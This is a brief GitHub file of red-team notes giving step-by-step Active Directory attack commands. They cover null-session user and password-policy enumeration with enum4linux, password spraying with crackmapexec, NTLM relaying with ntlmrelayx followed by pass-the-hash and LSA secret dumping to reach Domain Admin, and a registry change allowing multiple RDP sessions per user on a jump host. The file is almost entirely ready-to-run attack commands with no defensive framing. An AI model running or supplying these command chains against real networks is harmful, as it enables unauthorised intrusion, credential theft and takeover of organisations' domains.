TEST/note at master · SoriaTi/TEST · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Everything patched? Good baselines? Find NULL Sessions!
1) Find your DC's
nmap -sS -p3268,3269 -iL subnets.txt
2) Enumerate Users
enum4linux -U 192.168.x.x
3) Pull Password Policy
enum4linux -P 192.168.x.x
4) Password Spray Usernames
cme smb 192.168.x.x -u users.txt -p Summer2019

[I'm not following. I'm using Null sessions to extract usernames and password policy. Then crackmapexec to log all those users in at once with the password "Summer2019".]


How I got Domain Admin today. Relay creds>SAM dump>PTH> read cleartxt

1) cme smb <CIDR> --gen-relay-list smbrelay.txt
2) http://ntlmrelayx.py -tf smbrelay.txt
3) Wait for admin hash (500)
4) cme smb <CIDR> -u username -H NTHASH --lsa
5) cat /root/.cme/logs/*.secrets |sort -u


Red Tip #344: Set HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0, to allow multiple sessions on a server per user. This is useful if you want to login to the jump-host, but that guy's just on all-day-long...


Get-ComputerInfo